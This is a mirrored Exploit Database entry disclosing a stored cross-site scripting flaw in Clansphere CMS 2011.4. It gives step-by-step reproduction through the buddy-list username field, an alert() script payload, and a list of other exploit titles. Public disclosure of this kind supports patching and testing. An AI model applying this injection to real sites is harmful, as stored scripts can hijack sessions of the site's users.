Clansphere CMS 2011.4 – Stored Cross-Site Scripting (XSS)

Exploit Database
42 阅读

作者： Sinem Şahin

日期： 2023-03-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51070/

# Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Sinem Şahin
# Date: 2022-10-08
# Vendor Homepage: https://www.csphere.eu/
# Version: 2011.4
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872
2- Write XSS Payload into the username of the buddy list create.
3- Press "Save" button.

XSS Payload ==> "<script>alert("usernameXSS")</script> 

Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md

last Exploits
Clansphere CMS 2011.4 – Stored Cross-Site Scripting (XSS)的更多信息

Intellinet IP Camera INT-L100M20N – Unauthorized Admin Credential Change：
MySmartBB 1.0.0 – Cross-Site Scripting：
Device Manager Express 7.8.20002.47752 – Remote Code Execution (RCE)：
FS Lynda Clone 1.0 – SQL Injection：
123 Flash Chat 7.8 – Multiple Vulnerabilities：
Joomla! Component com_hdflvplayer < 2.1.0.1 - SQL Injection：
WordPress Theme Diary/Notebook Site5 – Email Spoofing：
OpenEMR 5.0.2.1 – Remote Code Execution：